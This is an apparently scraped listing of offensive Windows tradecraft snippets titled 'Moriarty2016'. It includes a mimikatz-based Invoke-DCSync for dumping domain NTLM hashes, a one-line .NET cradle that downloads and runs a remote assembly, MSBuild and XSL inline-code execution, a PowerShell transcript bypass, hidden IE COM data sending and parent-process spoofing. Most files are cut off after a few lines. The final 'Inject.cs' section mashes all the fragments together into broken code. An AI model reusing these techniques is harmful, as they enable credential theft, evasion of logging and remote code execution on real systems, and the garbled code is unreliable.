Moriarty2016

## clr_via_native.c
#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

## katz.cs
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

/*

## ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);

    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);

## posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;

namespace TranscriptBypass
{
    // Compiling with CSC.exe v4.0.30319 or v3.5

## Invoke-DCSync.ps1
function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y

## DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }

## JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
    <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >

## JankyAF.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt"
  xmlns:u="urn:my-scripts">
    <!--
	'<a/>' > blah.txt
	$xslt = New-Object System.Xml.Xsl.XslTransform
	$xslt.Load("$pwd\JankyAF.xsl");
	$xslt.Transform("$pwd\blah.txt","$pwd\blah.txt")
  -->
  <msxsl:script language="C#" implements-prefix="u">

## GetSystem.ps1
<#

$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

#>

#Simple powershell/C# to spawn a process under a different parent process
#Launch PowerShell As Administrator

## Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{

	public TestClass()
	{}
	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;
	using System;
	using System.IO;
	using System.Text;
	using System.IO.Compression;
	using System.EnterpriseServices;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;
	using System.Security.Cryptography;

	/*
	// sample function that takes in a destination server, POST data, and custom HTTP request headers
	private string SendData(string dst, byte[] postData, string customHeaders)
	{
	Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
	object IE = Activator.CreateInstance(com_type);

	object[] falseArr = new object[] { false };
	object[] trueArr = new object[] { true };
	com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
	com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
	using System;
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Security;
	using System.Management.Automation.Runspaces;
	using System.Reflection;

	namespace TranscriptBypass
	{
	// Compiling with CSC.exe v4.0.30319 or v3.5
	function Invoke-DCSync
	{
	<#
	.SYNOPSIS

	Uses dcsync from mimikatz to collect NTLM hashes from the domain.

	Author: @monoxgas
	Improved by: @harmj0y
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:u="urn:my-scripts">
	<!--
	'<a/>' > blah.txt
	$xslt = New-Object System.Xml.Xsl.XslTransform
	$xslt.Load("$pwd\JankyAF.xsl");
	$xslt.Transform("$pwd\blah.txt","$pwd\blah.txt")
	-->
	<msxsl:script language="C#" implements-prefix="u">
	<#

	$owners = @{}
	gwmi win32_process \|% {$owners[$_.handle] = $_.getowner().user}
	get-process \| select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

	#>

	#Simple powershell/C# to spawn a process under a different parent process
	#Launch PowerShell As Administrator
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	public class TestClass
	{

	public TestClass()
	{}